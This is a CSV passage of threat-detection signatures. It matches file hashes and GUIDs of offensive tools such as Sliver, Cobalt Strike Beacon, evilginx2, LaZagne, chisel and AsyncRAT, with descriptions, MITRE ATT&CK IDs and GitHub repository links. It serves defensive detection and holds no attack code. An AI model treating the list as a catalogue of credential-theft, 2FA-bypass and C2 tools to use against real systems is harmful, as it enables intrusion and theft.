"*75b44f98a090124d3b41ff610e5e10af410c5161c6a746703123a62a20854139*",".{0,1000}75b44f98a090124d3b41ff610e5e10af410c5161c6a746703123a62a20854139.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*75d0adaef55ce5b4670e7634d3f440e9d7e0eb1e04cb98c3919d0ad66dffbdfe*",".{0,1000}75d0adaef55ce5b4670e7634d3f440e9d7e0eb1e04cb98c3919d0ad66dffbdfe.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*75E5F9A0-8D69-4426-9F16-4A65E941974D*",".{0,1000}75E5F9A0\-8D69\-4426\-9F16\-4A65E941974D.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*75e74ba8d2f24a1c4d0543fe9eb5476cfab3b433073412337b6806669a295fce*",".{0,1000}75e74ba8d2f24a1c4d0543fe9eb5476cfab3b433073412337b6806669a295fce.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*760980ec830603bf3bee659f92e939d2af88eef7bc50c2911cce1a41d35d881d*",".{0,1000}760980ec830603bf3bee659f92e939d2af88eef7bc50c2911cce1a41d35d881d.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*7612416d8bde145810923ed8f75d2c1fb81cdecc1aa7a997ae68cffb5dc99f43*",".{0,1000}7612416d8bde145810923ed8f75d2c1fb81cdecc1aa7a997ae68cffb5dc99f43.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*76318bcd19b5f3efe0e51c77593bccd6804c6a30b95c4c51ec528c30c7faca83*",".{0,1000}76318bcd19b5f3efe0e51c77593bccd6804c6a30b95c4c51ec528c30c7faca83.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*763c42f5892b8c16de901e8a29343b863dc75bed587e2f4c9a22eb1b9e8809f2*",".{0,1000}763c42f5892b8c16de901e8a29343b863dc75bed587e2f4c9a22eb1b9e8809f2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7640c7c4319797fd280939186677d05362a592892b6fe65f41dcee7cdb11fe36*",".{0,1000}7640c7c4319797fd280939186677d05362a592892b6fe65f41dcee7cdb11fe36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*764bb35ebb1011e7bfff6991af628ee1ef56119f4e77d5a893439e40101e3ed3*",".{0,1000}764bb35ebb1011e7bfff6991af628ee1ef56119f4e77d5a893439e40101e3ed3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7654bca1fed2114ef8e78d51ef5dfccb2ccb73e51ae0dc65f4823b33457a3b40*",".{0,1000}7654bca1fed2114ef8e78d51ef5dfccb2ccb73e51ae0dc65f4823b33457a3b40.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*765C5755-DBE9-4AB5-9427-921D0E46F9F0*",".{0,1000}765C5755\-DBE9\-4AB5\-9427\-921D0E46F9F0.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*767ba8f7f88dcc0b5488ca7c93a5e29a7a6ed3195b8ac4027e0108db0ff2805d*",".{0,1000}767ba8f7f88dcc0b5488ca7c93a5e29a7a6ed3195b8ac4027e0108db0ff2805d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*76b70dcbcb1d45935f1b12eef38162b812f88bb4ff89a07a46609d879019103e*",".{0,1000}76b70dcbcb1d45935f1b12eef38162b812f88bb4ff89a07a46609d879019103e.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*76c30e2ea86c1c11238c23cc8e6e88ed76cfd666832df7af587036d20a1e98b5*",".{0,1000}76c30e2ea86c1c11238c23cc8e6e88ed76cfd666832df7af587036d20a1e98b5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*76c7648f79cc5a78f49e9ca24b26a82348e0292b3676ae04bdf22a88cb7eeadc*",".{0,1000}76c7648f79cc5a78f49e9ca24b26a82348e0292b3676ae04bdf22a88cb7eeadc.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*76d3b949f37c9e74abb3b4bf91727c4feaf3feba1e32a42706a7843cf83d5c60*",".{0,1000}76d3b949f37c9e74abb3b4bf91727c4feaf3feba1e32a42706a7843cf83d5c60.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*76d64e0cf551962a2ba20813933207dd398d1d06383c27765874219642218eca*",".{0,1000}76d64e0cf551962a2ba20813933207dd398d1d06383c27765874219642218eca.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*76d92b0b8c428610081a7c45645612af9a7309cafd971a366d5992f5654f5f51*",".{0,1000}76d92b0b8c428610081a7c45645612af9a7309cafd971a366d5992f5654f5f51.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*76FFA92B-429B-4865-970D-4E7678AC34EA*",".{0,1000}76FFA92B\-429B\-4865\-970D\-4E7678AC34EA.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*772a8b19e2abd21dc6f10dc1ac4ff07e52e8f242716c1308e14a1e9fb81e7cd7*",".{0,1000}772a8b19e2abd21dc6f10dc1ac4ff07e52e8f242716c1308e14a1e9fb81e7cd7.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*7734774a6bbb47e7c0f32f4903928df120887180ddae7bb2bd4d15cd17a4a7c1*",".{0,1000}7734774a6bbb47e7c0f32f4903928df120887180ddae7bb2bd4d15cd17a4a7c1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*7739fe1e685d5ec7296d83851614eb9cedaf7472aece8e1144f2b14fa544db57*",".{0,1000}7739fe1e685d5ec7296d83851614eb9cedaf7472aece8e1144f2b14fa544db57.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7760248F-9247-4206-BE42-A6952AA46DA2*",".{0,1000}7760248F\-9247\-4206\-BE42\-A6952AA46DA2.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*7760248F-9247-4206-BE42-A6952AA46DA2*",".{0,1000}7760248F\-9247\-4206\-BE42\-A6952AA46DA2.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*7760d7ef318933db6b09dba08ec12ddf25ead0512c45bd914256c97470c4eb29*",".{0,1000}7760d7ef318933db6b09dba08ec12ddf25ead0512c45bd914256c97470c4eb29.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*7767C300-5FD5-4A5D-9D4C-59559CCE48A3*",".{0,1000}7767C300\-5FD5\-4A5D\-9D4C\-59559CCE48A3.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","10","10","2110","708","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z" "*7787d9292fae90d6ac9b4b9e691ae56a08e199ea96a974d45c26bc5cb30f3d8e*",".{0,1000}7787d9292fae90d6ac9b4b9e691ae56a08e199ea96a974d45c26bc5cb30f3d8e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*778b2aafed8b0255a30082314f27182bb6f88c3aed0ecbda92aa092515acf955*",".{0,1000}778b2aafed8b0255a30082314f27182bb6f88c3aed0ecbda92aa092515acf955.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*77b1042ad03c451d66b967673277d153869dafec091c3b43167c309722af44db*",".{0,1000}77b1042ad03c451d66b967673277d153869dafec091c3b43167c309722af44db.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*77b587e37104e7a1e8858e76cbfa2580d8633ce37c836e28c3ebbdfcf3db0571*",".{0,1000}77b587e37104e7a1e8858e76cbfa2580d8633ce37c836e28c3ebbdfcf3db0571.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*77b78b6e16972c318fcbba39976858787cc31038f82952d2a94f844f5847a61e*",".{0,1000}77b78b6e16972c318fcbba39976858787cc31038f82952d2a94f844f5847a61e.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*77de77149c63a656601bc3d0f4c2704ca8e22673abfb1d235e4f45d5e5befb56*",".{0,1000}77de77149c63a656601bc3d0f4c2704ca8e22673abfb1d235e4f45d5e5befb56.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*77ec2daecb8490e270bf628cbd585180731178e4a859e75c833dfcfffabcf34f*",".{0,1000}77ec2daecb8490e270bf628cbd585180731178e4a859e75c833dfcfffabcf34f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*77efc4024d86cf813ea6f93ef2b98dd4ff8bb8a46f0fd145465786690a27b169*",".{0,1000}77efc4024d86cf813ea6f93ef2b98dd4ff8bb8a46f0fd145465786690a27b169.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*77F955C3-4910-49EA-9CD4-CBF5AD9C071A*",".{0,1000}77F955C3\-4910\-49EA\-9CD4\-CBF5AD9C071A.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*7806b81514ecc44219a6f6193b15b23aea0a947f3c91b339332bea1445745596*",".{0,1000}7806b81514ecc44219a6f6193b15b23aea0a947f3c91b339332bea1445745596.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*78434b52f03704cdf214f0497bdef7180741d5d7e40f404970508490c76731ec*",".{0,1000}78434b52f03704cdf214f0497bdef7180741d5d7e40f404970508490c76731ec.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*784F8029-4D72-4363-9638-5A8D11545494*",".{0,1000}784F8029\-4D72\-4363\-9638\-5A8D11545494.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*7864978aad22ff10f75864376b0e57d7ec3ba8bd84e663c2c650f5fc45a9b388*",".{0,1000}7864978aad22ff10f75864376b0e57d7ec3ba8bd84e663c2c650f5fc45a9b388.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*787695c6fb15d43a120150628c8d0717983a797682b76106984d717379ccaed0*",".{0,1000}787695c6fb15d43a120150628c8d0717983a797682b76106984d717379ccaed0.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*789CF3CBCC0DC849CC2B51703652084E2D2A4B2D02003B5C0650*",".{0,1000}789CF3CBCC0DC849CC2B51703652084E2D2A4B2D02003B5C0650.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*78a8a0392afbefb487d65be78caff5efb2f2f55de2593ea90c0ab23ed727afe2*",".{0,1000}78a8a0392afbefb487d65be78caff5efb2f2f55de2593ea90c0ab23ed727afe2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*78b372bf29a88ec2683f975ab11a728a53a19dba021023d9b2ee46fb94cf3a66*",".{0,1000}78b372bf29a88ec2683f975ab11a728a53a19dba021023d9b2ee46fb94cf3a66.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*78bbfbd2d6f42dad63fe000ec04b0c74bd35270b2cc5765404f5c780fe398f88*",".{0,1000}78bbfbd2d6f42dad63fe000ec04b0c74bd35270b2cc5765404f5c780fe398f88.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 